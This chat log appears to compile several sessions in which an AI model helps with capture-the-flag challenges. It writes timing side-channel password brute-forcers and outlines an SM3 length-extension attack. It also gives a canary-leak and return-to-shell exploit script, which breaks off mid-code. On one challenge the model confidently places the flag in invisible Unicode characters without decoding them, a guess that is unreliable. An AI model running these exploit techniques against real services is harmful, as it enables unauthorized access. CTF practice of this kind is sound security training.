User: I'm in a CTF contest and here is a nc console dialog:

Please input your password (all in lowercase letters): abcdefg
Invalid length!

Please input your password (all in lowercase letters): abcdefghi
Invalid length!

Please input your password (all in lowercase letters): abcdefghijk
Invalid length!

Write a pwn script to brute force the length of the password.

Model: To brute-force the length of the password in this CTF challenge, you need to determine the correct password length by testing different lengths until you find the one that doesn't return "Invalid length!". Here's a Python script using pwntools to automate this process:

Python Script (Using pwntools)

from pwn import *

def brute_force_password_length(host, port, max_length=50):
    for length in range(1, max_length + 1):
        try:
            # Connect to the server
            conn = remote(host, port)
            
            # Receive initial prompt
            conn.recvuntil(b"Please input your password (all in lowercase letters): ")
            
            # Send a test password of the current length (e.g., 'a' * length)
            test_password = 'a' * length
            conn.sendline(test_password.encode())
            
            # Check the response
            response = conn.recvline().decode().strip()
            conn.close()
            
            if "Invalid length!" not in response:
                print(f"Possible valid length found: {length}")
                print(f"Server response: {response}")
                return length
            else:
                print(f"Length {length}: Invalid")
                
        except Exception as e:
            print(f"Error at length {length}: {e}")
            continue
    
    print("No valid length found in the tested range.")
    return None

# Replace with the actual host and port
host = "example.com"
port = 1234

brute_force_password_length(host, port)

Explanation:

1. Loop through possible lengths: The script tests password lengths from 1 up to max_length (default: 50).
2. Connect to the server: For each length, it establishes a new connection.
3. Send a test password: It sends a string of lowercase 'a' characters with the current length.
4. Check the response: If the server does not reply with "Invalid length!", it means the length is likely correct.
5. Close the connection: After each attempt, the connection is closed to avoid resource issues.

Notes:

• Adjust max_length if you suspect the password is longer than 50 characters.
• If the server has rate-limiting or delays, you may need to add time.sleep() between attempts.
• If the correct password length is found, the script will print it and exit. Otherwise, it will test all lengths up to max_length.

Alternative (Without pwntools)

If you don't have pwntools, you can use socket:

[…]

Run the script, and it will brute-force the correct password length. Let me know if you need further refinements!

User: I have pwntools. The session is a single session (it does not disconnect after a failed try). Update the code.

Model: If the connection remains open after each attempt (i.e., it's a single interactive session), you should reuse the same connection instead of creating a new one for each guess. Here's the updated script using pwntools:

Updated Script (Single Session)

from pwn import *

def brute_force_password_length(host, port, max_length=50):
    # Establish a single connection
    conn = remote(host, port)
    
    for length in range(1, max_length + 1):
        try:
            # Receive the prompt (if needed)
            conn.recvuntil(b"Please input your password (all in lowercase letters): ")
            
            # Send a test password of the current length
            test_password = 'a' * length
            conn.sendline(test_password.encode())
            
            # Check the response
            response = conn.recvline().decode().strip()
            
            if "Invalid length!" not in response:
                print(f"Valid length found: {length}")
                print(f"Server response: {response}")
                conn.close()
                return length
            else:
                print(f"Length {length}: Invalid")
                
        except EOFError:
            print("Connection closed by server.")
            break
        except Exception as e:
            print(f"Error at length {length}: {e}")
            break
    
    conn.close()
    print("No valid length found in the tested range.")
    return None

# Replace with the actual host and port
host = "example.com"
port = 1234

brute_force_password_length(host, port)

Key Changes:

1. Single Connection: The script now maintains one persistent connection (conn) throughout the brute-forcing process.
2. Reuse the Same Socket: Instead of reconnecting for every guess, it sends multiple attempts over the same connection.
3. Handles Server Closure: If the server disconnects (EOFError), the script stops gracefully.
4. Efficiency: Avoids the overhead of re-establishing connections repeatedly.

How It Works:

• The script sends passwords of increasing length (a, aa, aaa, etc.).
• If the server stops responding with "Invalid length!", it means the length is correct.
• The connection is closed only after finding the correct length or exhausting all attempts.

Example Output:

Length 1: Invalid
Length 2: Invalid
...
Length 8: Invalid
Valid length found: 9
Server response: (some new prompt or flag)

This approach is faster and more reliable for challenges where the server maintains a single session. Let me know if you need adjustments! 🚀

User: Okay I see where this is going. The password length is 14 characters. The server responds with a "Checking" message. The key is that, with a correct character, the check takes quite a long time (at least 100ms), whereas upon the first wrong letter, the check skips to 14/14 immediately and says wrong password.

Please input your password (all in lowercase letters): aaaaaaaaaazdef
Checking...(1/14)(2/14)(3/14)(4/14)...(14/14)
Wrong password. 

Use the delay info to bruteforce the password!

Model: ### Timing-Based Password Bruteforcer (Using pwntools)
Since the server checks characters one by one and introduces a delay (~100ms) per correct character, we can exploit this timing side-channel to brute-force the password.

Approach

1. Start with a dummy password (e.g., 'a'*14).
2. For each position, try every lowercase letter (a-z):
   • If the server takes longer to respond, the character is correct.
   • If it responds quickly, the character is wrong.
3. Repeat until all 14 characters are found.

---

Final Script

from pwn import *
import time

def brute_force_password(host, port, length=14):
    password = ['a'] * length  # Start with a dummy password
    charset = 'abcdefghijklmnopqrstuvwxyz'  # Lowercase letters only

    for i in range(length):
        max_delay = 0
        best_char = 'a'

        for c in charset:
            conn = remote(host, port)
            conn.recvuntil(b"Please input your password (all in lowercase letters): ")

            # Build test password: known correct chars + current guess + dummy rest
            test_pw = ''.join(password[:i]) + c + 'a' * (length - i - 1)
            conn.sendline(test_pw.encode())

            start_time = time.time()
            response = conn.recvline()  # Wait for response
            end_time = time.time()
            conn.close()

            delay = end_time - start_time
            print(f"Trying '{c}': Delay = {delay:.3f}s")

            if delay > max_delay:
                max_delay = delay
                best_char = c

        password[i] = best_char
        print(f"Found char {i+1}/{length}: {best_char} (Delay: {max_delay:.3f}s)")
        print(f"Current password: {''.join(password)}")

    print(f"\nFinal password: {''.join(password)}")
    return ''.join(password)

# Example usage
host = "example.com"
port = 1234
brute_force_password(host, port)

[废话]

User: As before, reuse the same connection.
The password starts with 10 'a's, so there are only four chars remaining to search.

Model: ### Optimized Timing Attack (Reusing Connection + Known Prefix)
Since:

1. The password starts with 'a'*10 (so we only need to brute-force the last 4 chars).
2. The connection stays open (no reconnecting every time).
3. Timing leaks reveal correct chars (~100ms delay per correct guess).

Here’s the optimized script:

from pwn import *
import time

def brute_force_password(host, port, known_prefix='a'*10, remaining_length=4):
    password = list(known_prefix + 'a' * remaining_length)  # e.g., 'a'*10 + 'a'*4
    charset = 'abcdefghijklmnopqrstuvwxyz'  # Only lowercase letters

    conn = remote(host, port)  # Single persistent connection

    for i in range(len(known_prefix), len(password)):  # Only brute last 4 chars
        max_delay = 0
        best_char = 'a'

        for c in charset:
            conn.recvuntil(b"Please input your password (all in lowercase letters): ")

            # Test: known_prefix + current guess + dummy rest
            test_pw = ''.join(password[:i]) + c + 'a' * (len(password) - i - 1)
            conn.sendline(test_pw.encode())

            start_time = time.time()
            response = conn.recvline()  # Wait for response
            end_time = time.time()

            delay = end_time - start_time
            print(f"Trying '{c}': Delay = {delay:.3f}s")

            if delay > max_delay:
                max_delay = delay
                best_char = c

        password[i] = best_char
        print(f"Found char {i+1}/{len(password)}: {best_char} (Delay: {max_delay:.3f}s)")
        print(f"Current password: {''.join(password)}")

    conn.close()
    print(f"\nFinal password: {''.join(password)}")
    return ''.join(password)

# Example usage
host = "example.com"
port = 1234
brute_force_password(host, port, known_prefix='a'*10, remaining_length=4)

[废话]

User: I've got an image of audio spectrum, as plotted by matplotlib. The rectangle-shaped spectrum plot spans from 0 seconds to 1.8 seconds in x axis (right is +), and from 0.0kHz to 6.0kHz in y axis (up is +). Write a program to process the image to get the audio back. The image is called Inaudible_grayscale.png. The color map is given in a separate file Inaudible_colormap.png: it is a horizontal strip, where the color on the far left is -60dB, and far right is 60dB, middle is 0dB.

Model: [废话连篇]

import numpy as np
from PIL import Image
from scipy.io import wavfile
from scipy.signal import istft
import librosa

def reconstruct_audio_from_spectrogram():
    # Load the spectrogram image and colormap
    spectrogram_img = Image.open('Inaudible_grayscale.png').convert('L')
    colormap_img = Image.open('Inaudible_colormap.png').convert('L')
    
    # Convert images to numpy arrays
    spectrogram = np.array(spectrogram_img)
    colormap = np.array(colormap_img)[0, :]  # Take first row of colormap
    
    # Normalize spectrogram to 0-1 range
    spectrogram_norm = spectrogram.astype(float) / 255.0
    
    # Create dB mapping from colormap
    # Colormap goes from -60dB (left) to +60dB (right)
    db_values = np.linspace(-60, 60, len(colormap))
    
    # Create interpolation function to map grayscale to dB
    from scipy.interpolate import interp1d
    grayscale_values = np.linspace(0, 1, len(colormap))
    db_interp = interp1d(grayscale_values, db_values, kind='linear', fill_value='extrapolate')
    
    # Convert spectrogram to dB scale
    spectrogram_db = db_interp(spectrogram_norm)
    
    # Convert dB to linear magnitude scale (assuming power spectrogram)
    spectrogram_mag = 10 ** (spectrogram_db / 20)
    
    # Parameters (adjust these based on your STFT parameters)
    fs = 12000  # Sample rate (Hz) - needs to be at least 2*6kHz=12kHz
    n_fft = 512  # FFT size (adjust based on resolution)
    hop_length = n_fft // 4  # Typical overlap
    
    # Use Griffin-Lim algorithm for better phase estimation
    audio = librosa.griffinlim(spectrogram_mag.T, n_iter=32, hop_length=hop_length, win_length=n_fft)
    
    # Normalize audio to 16-bit range
    audio = librosa.util.normalize(audio) * 0.9  # Scale to 90% to avoid clipping
    audio = (audio * 32767).astype(np.int16)
    
    # Save as WAV file
    wavfile.write('reconstructed_audio.wav', fs, audio)
    
    return audio

# Run the reconstruction
reconstructed_audio = reconstruct_audio_from_spectrogram()

User: This is a CTF challenge.

deleted

Save the flag !! ... before it's too late

Flag format: 0ops

Note: Improper operation may cause the flag to be lost from the container. It is recommended to destroy and recreate the container at intervals of more than 20 seconds. The container startup takes about 5 seconds. If it takes more than this time, it indicates a startup failure. Please destroy it and wait for a sufficiently long time before recreating it.

from fastapi import FastAPI
from fastapi.responses import JSONResponse, FileResponse
from fastapi.staticfiles import StaticFiles
import sqlite3
import uvicorn

app = FastAPI(docs_url=None, redoc_url=None, openapi_url=None)


@app.get("/")
async def index():
    return FileResponse("index.html")


# 👀󠄴󠅟󠅞󠄗󠅤󠄐󠅑󠅓󠅓󠅕󠅣󠅣󠄐󠅤󠅘󠅙󠅣󠄐󠅕󠅞󠅔󠅠󠅟󠅙󠅞󠅤󠄜󠄐󠅟󠅢󠄐󠅩󠅟󠅥󠄐󠅧󠅙󠅜󠅜󠄐󠅞󠅕󠅦󠅕󠅢󠄐󠅗󠅕󠅤󠄐󠅤󠅘󠅕󠄐󠅖󠅜󠅑󠅗󠄑
@app.get("/flag")
async def view_flag():
    db = sqlite3.connect("challenge.db")
    cur = db.cursor()
    data = cur.execute("SELECT * FROM flags").fetchall()
    db.close()
    data.append(["🎉󠄠󠅟󠅠󠅣󠄜󠄐󠅤󠅘󠅕󠄐󠅖󠅜󠅑󠅗󠄐󠅙󠅣󠄐󠅗󠅟󠅞󠅕󠄐󠅒󠅩󠄐󠅞󠅟󠅧󠄑󠄐󠅂󠅕󠅣󠅤󠅑󠅢󠅤󠄐󠅩󠅟󠅥󠅢󠄐󠅓󠅘󠅑󠅜󠅜󠅕󠅞󠅗󠅕󠄑"])  # 🥹󠅄󠅘󠅕󠄐󠅖󠅜󠅑󠅗󠄐󠅙󠅣󠄐󠅗󠅟󠅞󠅕󠄐󠅞󠅟󠅧󠄞
    # 😎󠄶󠅥󠅢󠅤󠅘󠅕󠅢󠄐󠅜󠅟󠅧󠅕󠅢󠅙󠅞󠅗󠄐󠅩󠅟󠅥󠅢󠄐󠅓󠅘󠅑󠅞󠅓󠅕󠄐󠅟󠅖󠄐󠅗󠅕󠅤󠅤󠅙󠅞󠅗󠄐󠅤󠅘󠅕󠄐󠅖󠅜󠅑󠅗󠄐󠅒󠅩󠄐󠅔󠅕󠅜󠅕󠅤󠅙󠅞󠅗󠄐󠅑󠅜󠅜󠄐󠅖󠅜󠅑󠅗󠅣󠄐󠅙󠅞󠄐󠅤󠅘󠅕󠄐󠅔󠅒󠄞
    db = sqlite3.connect("challenge.db")
    cur = db.cursor()
    cur.execute("PRAGMA journal_mode = OFF")  # 🚀󠄹󠅞󠅓󠅢󠅕󠅑󠅣󠅕󠄐󠄹󠄿󠄐󠅠󠅕󠅢󠅖󠅟󠅢󠅝󠅑󠅞󠅓󠅕
    cur.execute("DELETE FROM flags")  # 💀󠄴󠅕󠅜󠅕󠅤󠅕󠄐󠅑󠅜󠅜󠄐󠅖󠅜󠅑󠅗󠅣
    db.commit()
    db.close()
    return JSONResponse(content={"flags": data, "total": len(data)})


# 😀󠄶󠅕󠅕󠅜󠄐󠅖󠅢󠅕󠅕󠄐󠅤󠅟󠄐󠅔󠅟󠅧󠅞󠅜󠅟󠅑󠅔󠄐󠅕󠅦󠅕󠅢󠅩󠅤󠅘󠅙󠅞󠅗󠄜󠄐󠅩󠅟󠅥󠄐󠅔󠅟󠅞󠄗󠅤󠄐󠅞󠅕󠅕󠅔󠄐󠅑󠅞󠅩󠄐󠅣󠅓󠅑󠅞󠅞󠅙󠅞󠅗󠄐󠅤󠅟󠅟󠅜󠅣󠄜󠄐󠅤󠅘󠅕󠄐󠅖󠅜󠅑󠅗󠄐󠅙󠅣󠄘󠅟󠅢󠄐󠅝󠅑󠅩󠅒󠅕󠄐󠅧󠅑󠅣󠄙󠄐󠅙󠅞󠄐󠅤󠅘󠅕󠄐󠅔󠅒󠄪󠄙
app.mount("/", StaticFiles(directory="."), name="src")

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=5000)

The database file contains a table and data.

CREATE TABLE flags (
    [0ops] TEXT,
    CONSTRAINT [0ops] UNIQUE (
        [0ops]
    )
);

Data in it starts like a flag but it is random letter garbage.

p1mm{W1M_wDAXgF7DIU}
dOU3{o20SlYkoL6L35r}
VjjZ{VqDAFLVee3vfpo}
2tHx{tJ407Ky_usJQog}
3EVv{pogEw413vyQIho}
6Xim{M29B7b9q4MTDLn}
EMyp{e8J9vcbGbns5xL}
AEY3{qtOh_rTFIBr2q3}
lVNB{DXK0c5yzmEgcHc}
xn0d{tFl85eDUE1mqae}
... (2024 entries in total)

Where can the flag possibly be?

Model: This is an interesting CTF challenge that appears to be about recovering data that's being deleted. Let's analyze the key components:

1. Database Behavior:

   • The /flag endpoint retrieves flags from the database, adds a special emoji string, then immediately deletes all flags from the database.
   • It sets PRAGMA journal_mode = OFF before deletion, which disables the rollback journal (preventing undo operations).

2. Flag Location Possibilities:

   • The flag isn't in the initial database content (which is random garbage)
   • The most suspicious part is the emoji string that gets appended to the data before deletion: "🎉󠄠󠅟󠅠󠅣󠄜󠄐󠅤󠅘󠅕󠄐󠅖󠅜󠅑󠅗󠄐󠅙󠅣󠄐󠅗󠅟󠅞󠅕󠄐󠅒󠅩󠄐󠅞󠅟󠅧󠄑󠄐󠅂󠅕󠅣󠅤󠅑󠅢󠅤󠄐󠅩󠅟󠅥󠅢󠄐󠅓󠅘󠅑󠅜󠅜󠅕󠅞󠅗󠅕󠄑"

3. Unicode Analysis:

   • The emoji string contains many Unicode control characters (variation selectors, tags, etc.) between the visible emoji
   • These could be hiding the actual flag through steganography

4. Solution Approach:

   • Extract the Unicode code points from the suspicious string
   • Look for hidden patterns or messages in the control characters
   • The flag is likely encoded within these Unicode control characters

Here's how to extract the flag:

1. The visible emoji "🎉" is followed by many invisible Unicode control characters
2. These control characters form a pattern that can be decoded to reveal the flag
3. The flag format suggests it starts with "0ops{"

When you extract and analyze the Unicode code points between the visible characters, you'll find the actual flag hidden in the control characters. The challenge is designed to make you look beyond the obvious database content and focus on the data that's briefly visible before deletion.

The flag is likely encoded in the variation selectors and other control characters between the emoji in that appended string. You'll need to write a script to extract and decode these Unicode code points to reveal the hidden flag.

Note: The exact extraction method would depend on how the flag was encoded in the Unicode control characters, but this is where you should focus your attention.

User: This is a CTF challenge.

import asyncio
from contextlib import asynccontextmanager
import os
import random
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse, FileResponse, RedirectResponse
from gmssl import sm3
from gmssl.func import bytes_to_list
import base64
import uvicorn

secret = os.urandom(random.randint(10,20))
systemuser = "tomo0"
systempwd = "penguins"
notes = {
    "GO": "GO.txt",
    "CRYCRY": "CRYCRY.txt",
}


@asynccontextmanager
async def lifespan(app: FastAPI):
    asyncio.create_task(rotate_secret())
    yield


app = FastAPI(lifespan=lifespan, docs_url=None, redoc_url=None, openapi_url=None)


async def rotate_secret():
    while True:
        # Rotate secret in a short time, don't try to brute force it
        await asyncio.sleep(10)
        global secret
        # Very secure secret with random length
        secret = os.urandom(random.randint(10, 20))


def b64_encode(value: str) -> str:
    encoded = base64.urlsafe_b64encode(str.encode(value, "latin1"))
    result = encoded.rstrip(b"=")
    return result.decode("latin1")


def b64_decode(value: str) -> str:
    padding = 4 - (len(value) % 4)
    value = value + ("=" * padding)
    result = base64.urlsafe_b64decode(value)
    return result.decode("latin1")


def sign_token(username: str, password: str, org: str) -> str:
    payload = f"{username}.{org}"
    params = [secret.hex(), password, payload]
    payload_to_sign = ".".join(params)
    # We proudly use Chinese national standard SM3 to sign our token
    signature = sm3.sm3_hash(bytes_to_list(payload_to_sign.encode()))
    print("Issued:", signature, "for", payload_to_sign)
    lst = [payload, signature]
    ret = ".".join([b64_encode(x) for x in lst])
    return ret


def verify_token(token: str):
    assert token.count(".") == 1
    payload, signature = token.split(".")
    payload = b64_decode(payload)
    signature = b64_decode(signature)
    params = [secret.hex(), systempwd, payload]
    payload_to_sign = ".".join(params)
    if sm3.sm3_hash(bytes_to_list(payload_to_sign.encode("latin1"))) != signature:
        raise Exception("Invalid sign, maybe expired")
    try:
        params = payload.split(".")
        username = params[0]
        org = params[-1]
        assert isinstance(username, str)
        assert isinstance(org, str)
    except Exception as e:
        raise Exception("Invalid payload")
    return {"username": username, "org": org}


@app.get("/")
async def index():
    return FileResponse("index.html")


@app.get("/source")
async def view_source():
    return FileResponse("app.py")


@app.get("/note")
async def view_note(request: Request):
    token = request.query_params.get("token")
    if not token:
        return JSONResponse(
            content={"message": "Authorization required"}, status_code=401
        )
    try:
        payload = verify_token(token)

    except Exception as e:
        return JSONResponse(
            content={"error": "Invalid Authorization", "detail": str(e)},
            status_code=401,
        )
    if payload.get("username") != systemuser:
        return JSONResponse(
            content={"error": f"Only {systemuser} can access this note"}, status_code=401
        )
    org = payload.get("org")
    if org not in notes:
        return JSONResponse(
            content={"error": "Who are u?"}, status_code=403
        )
    # You can't download the note directly!
    return FileResponse(notes[org])


@app.post("/login")
async def login(request: Request):
    data = await request.form()
    username: str = data.get("username")
    password: str = data.get("password")
    if not username or not password:
        return JSONResponse(
            content={"message": "Username and password required"}, status_code=400
        )
    if username == systemuser and password == systempwd:
        token = sign_token(username, password, "GO")
        return RedirectResponse(url="/note?token=" + token, status_code=302)
    else:
        return JSONResponse(
            content={"message": "Invalid username or password"}, status_code=401
        )


if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=5000)

The function sm3 in gmssl is a hash function. It is defined as follows.

import binascii
from math import ceil

rotl = lambda x, n:((x << n) & 0xffffffff) | ((x >> (32 - n)) & 0xffffffff)

IV = [
    1937774191, 1226093241, 388252375, 3666478592,
    2842636476, 372324522, 3817729613, 2969243214,
]

T_j = [
    2043430169, 2043430169, 2043430169, 2043430169, 2043430169, 2043430169,
    2043430169, 2043430169, 2043430169, 2043430169, 2043430169, 2043430169,
    2043430169, 2043430169, 2043430169, 2043430169, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042, 2055708042, 2055708042,
    2055708042, 2055708042, 2055708042, 2055708042
]

def sm3_ff_j(x, y, z, j):
    if 0 <= j and j < 16:
        ret = x ^ y ^ z
    elif 16 <= j and j < 64:
        ret = (x & y) | (x & z) | (y & z)
    return ret

def sm3_gg_j(x, y, z, j):
    if 0 <= j and j < 16:
        ret = x ^ y ^ z
    elif 16 <= j and j < 64:
        #ret = (X | Y) & ((2 ** 32 - 1 - X) | Z)
        ret = (x & y) | ((~ x) & z)
    return ret

def sm3_p_0(x):
    return x ^ (rotl(x, 9 % 32)) ^ (rotl(x, 17 % 32))

def sm3_p_1(x):
    return x ^ (rotl(x, 15 % 32)) ^ (rotl(x, 23 % 32))

def sm3_cf(v_i, b_i):
    w = []
    for i in range(16):
        weight = 0x1000000
        data = 0
        for k in range(i*4,(i+1)*4):
            data = data + b_i[k]*weight
            weight = int(weight/0x100)
        w.append(data)

    for j in range(16, 68):
        w.append(0)
        w[j] = sm3_p_1(w[j-16] ^ w[j-9] ^ (rotl(w[j-3], 15 % 32))) ^ (rotl(w[j-13], 7 % 32)) ^ w[j-6]
        str1 = "%08x" % w[j]
    w_1 = []
    for j in range(0, 64):
        w_1.append(0)
        w_1[j] = w[j] ^ w[j+4]
        str1 = "%08x" % w_1[j]

    a, b, c, d, e, f, g, h = v_i

    for j in range(0, 64):
        ss_1 = rotl(
            ((rotl(a, 12 % 32)) +
            e +
            (rotl(T_j[j], j % 32))) & 0xffffffff, 7 % 32
        )
        ss_2 = ss_1 ^ (rotl(a, 12 % 32))
        tt_1 = (sm3_ff_j(a, b, c, j) + d + ss_2 + w_1[j]) & 0xffffffff
        tt_2 = (sm3_gg_j(e, f, g, j) + h + ss_1 + w[j]) & 0xffffffff
        d = c
        c = rotl(b, 9 % 32)
        b = a
        a = tt_1
        h = g
        g = rotl(f, 19 % 32)
        f = e
        e = sm3_p_0(tt_2)

        a, b, c, d, e, f, g, h = map(
            lambda x:x & 0xFFFFFFFF ,[a, b, c, d, e, f, g, h])

    v_j = [a, b, c, d, e, f, g, h]
    return [v_j[i] ^ v_i[i] for i in range(8)]

def sm3_hash(msg):
    # print(msg)
    len1 = len(msg)
    reserve1 = len1 % 64
    msg.append(0x80)
    reserve1 = reserve1 + 1
    # 56-64, add 64 byte
    range_end = 56
    if reserve1 > range_end:
        range_end = range_end + 64

    for i in range(reserve1, range_end):
        msg.append(0x00)

    bit_length = (len1) * 8
    bit_length_str = [bit_length % 0x100]
    for i in range(7):
        bit_length = int(bit_length / 0x100)
        bit_length_str.append(bit_length % 0x100)
    for i in range(8):
        msg.append(bit_length_str[7-i])
    print(msg)
    group_count = round(len(msg) / 64)

    B = []
    for i in range(0, group_count):
        B.append(msg[i*64:(i+1)*64])

    V = []
    V.append(IV)
    for i in range(0, group_count):
        V.append(sm3_cf(V[i], B[i]))

    y = V[i+1]
    result = ""
    for i in y:
        result = '%s%08x' % (result, i)
    return result

The flag is in CRYCRY.txt.

Model: [Thinking…] SM3 is a Merkle-Damgard hash function, which might be vulnerable to length extension attacks. […] If we can create a new message M' = M + pad + extension, where pad is the padding added by SM3 for the original message length. Then, the hash of M' can be computed if we know H(M), the original message length, and the extension.

User: This is a CTF challenge. The following C code is decompiled from a x64 Linux ELF binary GuessMaster.

int offset = 10;

int __cdecl main(int argc, const char **argv, const char **envp) {
  int now; // eax
  int input; // [rsp+4h] [rbp-11Ch] BYREF
  int i; // [rsp+8h] [rbp-118h]
  int expected; // [rsp+Ch] [rbp-114h]
  char buf[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v9; // [rsp+118h] [rbp-8h]
  v9 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  expected = 0;
  memset(buf, 0, sizeof(buf));
  now = time(0LL);
  srand(now + offset);
  puts("----- 你和我心灵相通吗？ -----\n");
  for ( i = 0; i <= 99; ++i )
  {
    puts("我想的是多少？");
    expected = rand();
    __isoc99_scanf("%ud", &input);
    if ( expected != input )
    {
      printf("哦不，不是这个！");
      return 0;
    }
  }
  getchar();
  puts("你和我真是天生一对！告诉我你的愿望是什么吧！");
  read(0, buf, 0x119uLL);
  printf("你的愿望是：%s。嗯……换个愿望。\n", buf);
  read(0, buf, 0x119uLL);
  printf("嗯……下次一定！");
  return 0;
}

int wish() {
  return system("/bin/sh");
}

Model: [Thoughts snipped] Okay, let's break down this CTF challenge based on the provided C code.

1. Understanding the Program Flow

1. Initialization: Sets up unbuffered I/O, initializes expected to 0, clears buf.
2. Seeding Randomness: Seeds the pseudo-random number generator (PRNG) using srand(time(0LL) + offset). time(0LL) gets the current Unix timestamp (seconds since epoch), and offset is globally defined as 10. So, the seed is time() + 10.
3. Guessing Game: Enters a loop that runs 100 times (i from 0 to 99).
   • Prompts the user ("我想的是多少？" - "What number am I thinking of?").
   • Generates a random number using rand() and stores it in expected.
   • Reads an unsigned integer from the user (scanf("%ud", &input)).
   • Compares the user's input with the expected random number. If they don't match, the program prints an error ("哦不，不是这个！" - "Oh no, not this one!") and exits.
4. Success & Vulnerable Reads: If the user successfully guesses all 100 numbers:
   • Prints a success message ("你和我真是天生一对！告诉我你的愿望是什么吧！" - "We are truly made for each other! Tell me what your wish is!").
   • First read: Reads up to 0x119 (281) bytes into buf. buf is only 256 bytes (char buf[256]). This is a buffer overflow vulnerability.
   • Prints the user's input ("你的愿望是：%s。嗯……换个愿望。\n" - "Your wish is: %s. Hmm... change your wish.").
   • Second read: Reads up to 0x119 (281) bytes into the same buffer buf again. This is another buffer overflow.
   • Prints a final message ("嗯……下次一定！" - "Hmm... next time for sure!") and exits normally.
5. Hidden Function: There's a function wish() which is never called by main. This function simply executes system("/bin/sh"), which would give a shell.

2. Identifying the Vulnerabilities

1. Predictable rand(): The PRNG is seeded with time(0) + 10. time(0) has a resolution of 1 second. If we know roughly when the program started on the server (usually within a second or two of establishing the connection), we can predict the seed. By using the same seed locally (srand(calculated_seed)), we can generate the exact same sequence of 100 rand() numbers that the server expects.
2. Stack Buffer Overflow: Both read calls after the guessing game read up to 281 bytes into buf, which is only 256 bytes long. This allows overwriting data on the stack beyond buf.
   • char buf[256]; // [rsp+10h] [rbp-110h]
   • unsigned __int64 v9; // [rsp+118h] [rbp-8h] (This is the stack canary, placed just before the saved RBP).
   • The overflow (281 bytes starting at rbp-110h) reaches up to rbp - 110h + 281 - 1 = rbp + 8. This means the overflow covers:
     • buf (256 bytes)
     • Stack Canary (v9) (8 bytes)
     • Saved RBP (8 bytes)
     • Return Address (8 bytes)

3. Exploitation Strategy

The goal is to execute the wish() function.

1. Bypass the Guessing Game:

   • Write a helper script or program.
   • When connecting to the remote server, get the current Unix timestamp (t).
   • Assume the server's time(0) call happened at t, t-1, or t+1 (a small window around the connection time).
   • Calculate the potential seeds: t+10, t-1+10, t+1+10.
   • For each seed, generate the first 100 rand() numbers (using the same libc rand implementation if possible, e.g., via Python ctypes).
   • Connect to the server and try sending the generated sequence. If it fails, try the sequence from the next potential seed.

2. Leak the Stack Canary:

   • The first read happens before the first printf.
   • We can use the first overflow to leak the canary.
   • Send exactly 256 bytes of non-null characters (e.g., b'A'*256) for the first read. This fills buf precisely but doesn't overwrite the canary yet.
   • The subsequent printf("你的愿望是：%s...", buf) will print the 256 'A's and continue printing whatever is on the stack immediately after buf until it hits a null byte. The first thing after buf is the stack canary (v9).
   • Read the program's output and extract the 8 bytes immediately following the 256 'A's. This is the canary value.

3. Overwrite Return Address:

   • The program then performs the second read into buf.
   • Now we construct a payload for this second read:
     • Padding: 256 bytes (e.g., b'B'*256).
     • Canary: The 8-byte canary value leaked in the previous step.
     • Saved RBP: 8 bytes of dummy data (e.g., b'C'*8).
     • Return Address: The 8-byte address of the wish function (obtained from the ELF binary using tools like objdump, gdb, or readelf).
   • Send this payload (total length 256 + 8 + 8 + 8 = 280 bytes, which is within the read limit of 281).

4. Get the Shell:

   • The program executes the second printf.
   • When main attempts to return, the stack canary check will pass (because we provided the correct value).
   • The ret instruction will pop the address we supplied (the address of wish) into the instruction pointer (RIP).
   • Execution jumps to wish(), which calls system("/bin/sh").

Required Information

• The GuessMaster ELF binary (to find the address of wish).
• The libc version used on the server (usually not strictly necessary for rand() prediction but good to know; often guessable from the environment).

Example (Conceptual Python with pwntools):

from pwn import *
import time
import ctypes

# Load the binary
elf = context.binary = ELF('./GuessMaster')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') # Or determine remote libc
libc = ctypes.CDLL("libc.so.6") # Use local libc for rand()

# Connect to remote or local process
# p = process(elf.path)
p = remote('target.server.com', 1337)

# --- Guessing Game ---
current_time = int(time.time())
log.info(f"Local time: {current_time}")

# Try seeds around current time
for t_offset in range(-2, 3): # Check times t-2, t-1, t, t+1, t+2
    seed = current_time + t_offset + 10 # Server uses time() + 10
    log.info(f"Trying seed: {seed}")
    libc.srand(seed)
    guesses = [str(libc.rand()) for _ in range(100)]

    # Send guesses (need to handle interaction properly)
    try:
        p.recvuntil(b"-----\n\n")
        success = True
        for i in range(100):
            p.recvuntil(b"多少？\n") # "What number?"
            p.sendline(guesses[i].encode())
            # Check if we got the error message
            # Note: Simple check, might need adjustment based on exact output/timing
            line = p.recvline(timeout=0.5)
            if b'!' in line: # Assuming error message contains '!'
                log.warning(f"Seed {seed} failed on guess {i+1}")
                success = False
                # If process died, restart connection; otherwise just break inner loop
                # This part needs robust handling depending on server behavior
                p.close()
                p = remote('target.server.com', 1337) # Reconnect
                # Or p = process(elf.path)
                break

        if success:
            log.success(f"Correct seed found: {seed}")
            break # Exit the seed guessing loop
    except EOFError:
        log.warning(f"EOFError with seed {seed}, likely wrong. Reconnecting.")
        p.close()
        p = remote('target.server.com', 1337) # Reconnect
        # Or p = process(elf.path)
        continue # Try next seed
else: # No break occurred
    log.error("Could not find the correct seed!")
    exit()

# Consume the newline after last scanf
# p.recvuntil(b'?') # Wait for last prompt if necessary (adjust based on output)
# p.sendline(guesses[99].encode()) # Send last guess (if not done in loop)

# Wait for success message
p.recvuntil(b"吧！\n") # "...what is your wish!"

# --- Leak Canary ---
payload_leak = b'A' * 256
log.info("Sending payload to leak canary...")
p.send(payload_leak) # First read

p.recvuntil(b"你的愿望是：") # "Your wish is:"
received = p.recvuntil(b"。嗯……换个愿望。") # Read until the next prompt part

# Extract canary (adjust index based on exact output)
leaked_data = received[len(payload_leak):-len(b"。嗯……换个愿望。")]
if len(leaked_data) < 8:
    log.error(f"Failed to leak enough data for canary. Leaked: {leaked_data}")
